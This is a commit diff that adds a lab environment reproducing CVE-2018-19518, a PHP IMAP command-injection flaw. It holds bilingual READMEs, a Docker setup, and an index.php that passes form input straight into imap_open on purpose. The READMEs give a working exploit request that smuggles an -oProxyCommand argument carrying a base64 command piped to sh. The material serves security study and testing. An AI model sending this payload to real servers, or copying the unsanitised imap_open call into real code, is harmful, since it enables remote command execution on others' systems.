first commit

php/CVE-2018-19518/README.md

@@ -0,0 +1,48 @@
+# PHP IMAP Remote Command Execution (CVE-2018-19518)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The PHP IMAP extension is used for email operations in PHP. Its `imap_open` function calls `rsh` to connect to remote shells. In Debian/Ubuntu systems, `ssh` is used by default instead of `rsh` (meaning when you execute the `rsh` command, it actually executes `ssh`).
+
+Since the `ssh` command allows setting `-oProxyCommand=` to call third-party commands, attackers can inject this parameter to achieve remote command execution.
+
+References:
+
+- <https://bugs.php.net/bug.php?id=77153>
+- <https://github.com/Bo0oM/PHP_imap_open_exploit>
+- <https://antichat.com/threads/463395/#post-4254681>
+- <https://nvd.nist.gov/vuln/detail/CVE-2018-19518>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable PHP server:
+
+```
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:8080` to access the web page. The web functionality tests whether a mail server can be successfully connected, requiring server address, username, and password.
+
+The source code can be found in [index.php](www/index.php)
+
+## Vulnerability Reproduction
+
+Send the following request to execute the command `echo '1234567890'>/tmp/test0001`:
+
+```
+POST / HTTP/1.1
+Host: your-ip
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 125
+
+hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222
+```
+
+Execute `docker compose exec web bash` to enter the container, and you can see that `/tmp/test0001` has been successfully created:
+
+![](1.png)

php/CVE-2018-19518/README.zh-cn.md

@@ -0,0 +1,46 @@
+# PHP IMAP 远程命令执行漏洞（CVE-2018-19518）
+
+PHP IMAP 扩展用于在 PHP 中执行邮件收发操作。其 `imap_open` 函数会调用 `rsh` 来连接远程 shell，而在 Debian/Ubuntu 系统中默认使用 `ssh` 来代替 `rsh` 的功能（也就是说，在 Debian 系列系统中，执行 `rsh` 命令实际执行的是 `ssh` 命令）。
+
+由于 `ssh` 命令允许通过设置 `-oProxyCommand=` 来调用第三方命令，攻击者可以注入这个参数来实现远程命令执行。
+
+参考链接：
+
+- <https://bugs.php.net/bug.php?id=77153>
+- <https://github.com/Bo0oM/PHP_imap_open_exploit>
+- <https://antichat.com/threads/463395/#post-4254681>
+- <https://nvd.nist.gov/vuln/detail/CVE-2018-19518>
+
+## 环境搭建
+
+执行如下命令启动一个包含漏洞的 PHP 环境：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8080` 即可查看 Web 页面。Web 功能是测试邮件服务器是否能够成功连接，需要填写服务器地址、用户名和密码。
+
+目标源码在 [index.php](www/index.php)
+
+## 漏洞复现
+
+发送如下数据包即可成功执行命令 `echo '1234567890'>/tmp/test0001`：
+
+```
+POST / HTTP/1.1
+Host: your-ip
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 125
+
+hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222
+```
+
+执行 `docker compose exec web bash` 进入容器，可以看到 `/tmp/test0001` 已成功创建：
+
+![](1.png)

php/CVE-2018-19518/docker-compose.yml

@@ -0,0 +1,7 @@
+services:
+ web:
+   image: vulhub/php:5.6.38-apache
+   volumes:
+    - ./www:/var/www/html
+   ports:
+    - "8080:80"

php/CVE-2018-19518/www/index.php

@@ -0,0 +1,57 @@
+<?php
+if(!empty($_POST)) {
+    $imap = @imap_open('{'.$_POST['hostname'].':993/imap/ssl}INBOX', $_POST['username'], $_POST['password']);
+}
+?>
+<!doctype html>
+<html lang="en">
+<head>
+    <!-- Required meta tags -->
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+    <!-- Bootstrap CSS -->
+    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css" integrity="sha256-eSi1q2PG6J7g7ib17yAaWMcrr5GrtohYChqibrV7PBE=" crossorigin="anonymous">
+
+    <title>Input your email server</title>
+</head>
+<body>
+
+<div class="container">
+        <h2>Test your email server</h2>
+        <?php if(!empty($_POST)): ?>
+        <?php if($imap): ?>
+            <div class="alert alert-success" role="alert">
+                Connect successful!
+            </div>
+        <?php else: ?>
+            <div class="alert alert-danger" role="alert">
+                Connect failed!
+            </div>
+        <?php endif; ?>
+        <?php endif; ?>
+        <form method="post">
+            <div class="form-group">
+                <label>Server address</label>
+                <input type="text" name="hostname" class="form-control" >
+            </div>
+            <div class="form-group">
+                <label>Username</label>
+                <input type="text" name="username" class="form-control" >
+            </div>
+            <div class="form-group">
+                <label>Password</label>
+                <input type="password" class="form-control" name="password">
+            </div>
+            <button type="submit" class="btn btn-primary">Submit</button>
+        </form>
+</div>
+
+
+<!-- Optional JavaScript -->
+<!-- jQuery first, then Popper.js, then Bootstrap JS -->
+<script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8=" crossorigin="anonymous"></script>
+<script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.4/dist/umd/popper.min.js" integrity="sha256-EGs9T1xMHdvM1geM8jPpoo8EZ1V1VRsmcJz8OByENLA=" crossorigin="anonymous"></script>
+<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha256-VsEqElsCHSGmnmHXGQzvoWjWwoznFSZc6hs7ARLRacQ=" crossorigin="anonymous"></script>
+</body>
+</html>